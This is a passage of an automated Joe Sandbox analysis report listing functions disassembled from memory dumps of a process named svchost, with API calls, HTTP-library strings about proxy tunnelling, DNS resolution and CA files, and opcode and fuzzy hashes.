                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: calloc$ErrorLastbind
                          • String ID: bind() failed; %s
                          • API String ID: 2604820300-1141498939
                          • Opcode ID: 7bc519ee8a499a378ec1e593c3fbb73dd3b546b43241a3ee1cd0c05ba7678295
                          • Instruction ID: 8f068009b118fe8923d588858253bd2795ab2a160f5285aa97616ebb9e22466c
                          • Opcode Fuzzy Hash: 7bc519ee8a499a378ec1e593c3fbb73dd3b546b43241a3ee1cd0c05ba7678295
                          • Instruction Fuzzy Hash: C051B936B0AA8985FB629F21D8683B92791FB4AF88F050035DE4E4B796EF7CD441C744
                          Function 00007FFDA55BD5B2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: calloc$ErrorLastbind
                          • String ID: bind() failed; %s
                          • API String ID: 2604820300-1141498939
                          • Opcode ID: 4834e58cb49d261b6377d10aa27dd06f19d9498f0a5f6ef789ce10d3bb55ed5d
                          • Instruction ID: 795e7c2f448ee74db46a6a3aff96481aeaef30019cb7463b4f4734b2e154bc73
                          • Opcode Fuzzy Hash: 4834e58cb49d261b6377d10aa27dd06f19d9498f0a5f6ef789ce10d3bb55ed5d
                          • Instruction Fuzzy Hash: B3419C3A70AB8986EB528F21D8283A933A0FB49F84F050035DE4D4B796EF3CE491C744
                          Function 64947650 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          • RtlCaptureContext.KERNEL32 ref: 64947664
                          • RtlLookupFunctionEntry.KERNEL32 ref: 6494767B
                          • RtlVirtualUnwind.KERNEL32 ref: 649476BD
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 64947704
                          • UnhandledExceptionFilter.KERNEL32 ref: 64947711
                          • GetCurrentProcess.KERNEL32 ref: 64947717
                          • TerminateProcess.KERNEL32 ref: 64947725
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                          • String ID:
                          • API String ID: 3266983031-0
                          • Opcode ID: 33ab5fbe6a7f6738baf7fe0598ee7cd881b47e5c4ad5dffd753a986b7fe805ca
                          • Instruction ID: 438d6b427901decc57405f96a3468465558ffb2b952defd0a2bb9f003901ed9e
                          • Opcode Fuzzy Hash: 33ab5fbe6a7f6738baf7fe0598ee7cd881b47e5c4ad5dffd753a986b7fe805ca
                          • Instruction Fuzzy Hash: 6E210479691B0089EB088F65F85478A37FAF749B88F540226DE4D47725EF3AC16AC720
                          Function 00007FFDA55A6660 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 321COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                          • API String ID: 1294909896-247252918
                          • Opcode ID: 156e45087dade4cbdfb18956b2dcf3d437a72022adddaf9daba03c3ee53bdc1d
                          • Instruction ID: c62d4c6cbf4d59673031eb297d8a67d071c585c150831f51a20c20ab9c19b9d1
                          • Opcode Fuzzy Hash: 156e45087dade4cbdfb18956b2dcf3d437a72022adddaf9daba03c3ee53bdc1d
                          • Instruction Fuzzy Hash: C7E1946AB1A68A85EB229F2584683BD2791BF42F88F544931CF0E073D7DF3AE445C744
                          Function 00007FFDA559E4F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35encryptionCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Crypt$Context$AcquireCreateHashRelease
                          • String ID: @
                          • API String ID: 4045725610-2766056989
                          • Opcode ID: eda64063375f790d201ea2b42227e0505d930172d25bea1b1fe1ec1d78bfa8e1
                          • Instruction ID: 8252b5eb8efc2a2581018964cd924279f4ca6543f56d8afda756235d88cc008f
                          • Opcode Fuzzy Hash: eda64063375f790d201ea2b42227e0505d930172d25bea1b1fe1ec1d78bfa8e1
                          • Instruction Fuzzy Hash: B1F0626BB2165683F7218F31E81176A63A1AB95B48F448030CE4C86795EF3CD0928B08
                          Function 00007FFDA559E580 Relevance: 6.0, APIs: 4, Instructions: 33encryptionCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Crypt$Hash$Param$ContextDestroyRelease
                          • String ID:
                          • API String ID: 2110207923-0
                          • Opcode ID: 2113b808d93c1bafe5e9a1664c8f11832e68d79df5018abb9c08366270d1658f
                          • Instruction ID: aad29dbbde3f29412655c8b5b347b05e9735717365f4e44adb54943ca125e0e0
                          • Opcode Fuzzy Hash: 2113b808d93c1bafe5e9a1664c8f11832e68d79df5018abb9c08366270d1658f
                          • Instruction Fuzzy Hash: 2901216B719689C2EB11CF55E46432EA770FB86F84F548035DA4D06BA9CF3DD444CB04
                          Function 64946F50 Relevance: 4.5, APIs: 3, Instructions: 43timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAdjustment.KERNEL32 ref: 64946F72
                          • _errno.MSVCRT ref: 64946F95
                          • QueryPerformanceFrequency.KERNEL32 ref: 64946FB5
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: AdjustmentFrequencyPerformanceQuerySystemTime_errno
                          • String ID:
                          • API String ID: 931094001-0
                          • Opcode ID: 9c9b8dc8953adad8b182c48c2c5c1b28200ee0171dd9cfc96682e4bc88c00d4e
                          • Instruction ID: 19e011e90420178d8d56a0d731f9381e34ba0287a3f741502673f42520627ade
                          • Opcode Fuzzy Hash: 9c9b8dc8953adad8b182c48c2c5c1b28200ee0171dd9cfc96682e4bc88c00d4e
                          • Instruction Fuzzy Hash: 2E01F7B2690B4196FB05CF31D81035AB3A4FB85B58F04A155DA9A8A394FB3DC956CB20
                          Function 00007FFDA55AC4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CryptRandommemset
                          • String ID:
                          • API String ID: 642379960-0
                          • Opcode ID: acd7f054303f642666b329f4aee6ab01b26b8a1ef5792d49464d3ba23e8ad1d1
                          • Instruction ID: decd6eac7b765aaab4d5247aebc6a353c570e4a1cef9812a0c197dfc5c1f1982
                          • Opcode Fuzzy Hash: acd7f054303f642666b329f4aee6ab01b26b8a1ef5792d49464d3ba23e8ad1d1
                          • Instruction Fuzzy Hash: D4D02BA3B2458542DB2899B3B78356680426B69FC0F08D034EE09CF787DC2DC0814700
                          Function 00007FFDA559E570 Relevance: .0, Instructions: 3COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 89cb39701938fdc7906635887faca12e3e904e12cf13f359e93df5d23b0ebc69
                          • Instruction ID: 40ebba623c9e0c7470244728579415d90d2a66e74f288803c9f4af02428617dd
                          • Opcode Fuzzy Hash: 89cb39701938fdc7906635887faca12e3e904e12cf13f359e93df5d23b0ebc69
                          • Instruction Fuzzy Hash: 6FA01123B2B88AC0A200CB00E2A0F282220FB88B883808020880C028208E28A0028200
                          Function 00007FFDA557E760 Relevance: 56.3, APIs: 29, Strings: 3, Instructions: 279stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$inet_pton$_time64callocmallocqsortstrchrstrncmp
                          • String ID: /$/$Included max number of cookies (%zu) in request!
                          • API String ID: 3681627800-3317691674
                          • Opcode ID: 12525e24ea8cba6d847ec7e73fbdaaba0b9437617cd305ae2b877eee279e8d48
                          • Instruction ID: 8bca22f40a9b7cccfd9f7fbd99530187e1b5e828a10ce4948029bb8e3ed15b03
                          • Opcode Fuzzy Hash: 12525e24ea8cba6d847ec7e73fbdaaba0b9437617cd305ae2b877eee279e8d48
                          • Instruction Fuzzy Hash: C0C13F69B0FB4B45EB679F26982433927A0AF46F94F084931CE5E07B96DF3CE4458314
                          Function 00007FFDA5574680 Relevance: 34.8, APIs: 5, Strings: 18, Instructions: 350COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: CONNECT need to close+open$CONNECT phase completed$CONNECT receive$CONNECT response$CONNECT send$CONNECT start$CONNECT tunnel established, response %d$CONNECT tunnel failed, response %d$Connect me again please$Establish HTTP proxy tunnel to %s$Failed sending CONNECT to proxy$Proxy CONNECT aborted due to timeout$new tunnel state 'connect'$new tunnel state 'established'$new tunnel state 'failed'$new tunnel state 'init'$new tunnel state 'receive'$new tunnel state 'response'
                          • API String ID: 1294909896-470889996
                          • Opcode ID: af568989738b2105e361f7674dda1c2024948567b25806220ce1904ab6158573
                          • Instruction ID: 33095a9b0ba026931de729a6d6d227464852d93c9e8f5ded9bf6b7e343f880d4
                          • Opcode Fuzzy Hash: af568989738b2105e361f7674dda1c2024948567b25806220ce1904ab6158573
                          • Instruction Fuzzy Hash: 95F1717AB1A78B86EB56DF21A8243B96361EB42F90F844431DA4E47787DF3CE544C708
                          Function 00007FFDA5599710 Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 420stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchrstrcspn$_strdup
                          • String ID: %s: %s$Date$Host$X-%s-Date$host:%s$x-%s-date:%s
                          • API String ID: 2662505157-2873700390
                          • Opcode ID: 267493bf15667b16e07bb1d7e25cb914912c56e37e807d6e2361f4ba3e24c29a
                          • Instruction ID: 1b193ccf3fac8a7e75635cd807b2b31b108822a93de12c58b81623c812901cb6
                          • Opcode Fuzzy Hash: 267493bf15667b16e07bb1d7e25cb914912c56e37e807d6e2361f4ba3e24c29a
                          • Instruction Fuzzy Hash: 90F1BEAAB0E68A85FB638F1594603B967B1EF57F84F484031DA8D07787EE2CE445C349
                          Function 00007FFDA55CE500 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 156fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CA5
                            • Part of subcall function 00007FFDA5580C70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CB8
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CDF
                            • Part of subcall function 00007FFDA5580C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CEC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CE575
                          • CloseHandle.KERNEL32 ref: 00007FFDA55CE719
                          • GetLastError.KERNEL32 ref: 00007FFDA55CE75B
                            • Part of subcall function 00007FFDA55BA3B0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA55BA419
                            • Part of subcall function 00007FFDA55BA3B0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA55BA423
                            • Part of subcall function 00007FFDA55BA3B0: GetLastError.KERNEL32 ref: 00007FFDA55BA42B
                            • Part of subcall function 00007FFDA55BA3B0: SetLastError.KERNEL32 ref: 00007FFDA55BA437
                          • GetLastError.KERNEL32 ref: 00007FFDA55CE541
                            • Part of subcall function 00007FFDA55BA3B0: GetLastError.KERNEL32 ref: 00007FFDA55BA3D2
                            • Part of subcall function 00007FFDA55BA3B0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA55BA3DA
                          • CreateFileW.KERNEL32 ref: 00007FFDA55CE5AE
                          • GetLastError.KERNEL32 ref: 00007FFDA55CE5BD
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CE722
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CE72B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$free$_errno$ByteCharMultiWide$CloseCreateFileHandlemalloc
                          • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                          • API String ID: 2498712895-3430970913
                          • Opcode ID: d632e80786738a879cc92ecf9560aff02eb4a9c3525972646320cd2bdd4ba7ec
                          • Instruction ID: b5641fdcb02becaeb2de568d8280b130d24a4b5f1ebd04b0aec68cb53d2f6802
                          • Opcode Fuzzy Hash: d632e80786738a879cc92ecf9560aff02eb4a9c3525972646320cd2bdd4ba7ec
                          • Instruction Fuzzy Hash: 0C51B83A71E78A82EB239F52E8647BA6290BB4BF80F800135DD4D47786DF7CE5448748
                          Function 00007FFDA55C65F0 Relevance: 28.7, APIs: 10, Strings: 9, Instructions: 182stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: mallocmemchrstrncmp
                          • String ID: ../$..?$/$/$/..$/../$/..?$/./$/.?
                          • API String ID: 2664245045-515720033
                          • Opcode ID: 3b8f4d4bd35b1ac588a291b454dc91f57cea73a63c15a3c4c3322d1baef85d1b
                          • Instruction ID: ef3334d28a4460ae9fed8c20bf98c794bea1e3cc18f70e4570b032eef7acbb17
                          • Opcode Fuzzy Hash: 3b8f4d4bd35b1ac588a291b454dc91f57cea73a63c15a3c4c3322d1baef85d1b
                          • Instruction Fuzzy Hash: 2971A02AB0F59A81FA23CF199530339A7E1AF17F90F484031CA5D46796DF2CE296C309
                          Function 00007FFDA55914F0 Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 314stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchr$strtoul$memmove
                          • String ID: (non-permanent)$:%u$Added %.*s:%d:%s to DNS cache%s$Bad syntax CURLOPT_RESOLVE removal entry '%s'$Couldn't parse CURLOPT_RESOLVE entry '%s'$RESOLVE %.*s:%d - old addresses discarded$RESOLVE *:%d using wildcard$Resolve address '%s' found illegal
                          • API String ID: 505971213-2408895650
                          • Opcode ID: b7fd7f15f64167894f2e4da75c14405a8666acd0d5e951fc8214c38987f03609
                          • Instruction ID: fb98be5f23d27ceaeb9da18c054a5f465530729531356444cc9f54b9bbaba068
                          • Opcode Fuzzy Hash: b7fd7f15f64167894f2e4da75c14405a8666acd0d5e951fc8214c38987f03609
                          • Instruction Fuzzy Hash: 09D1A22AF0A6AAC5EA629F25D4243BA67A4EF47F94F484531DA4D07787DF3CE405C308
                          Function 00007FFDA558A570 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 215stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdupcallocfreemallocstrrchr
                          • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                          • API String ID: 3403504057-4131979473
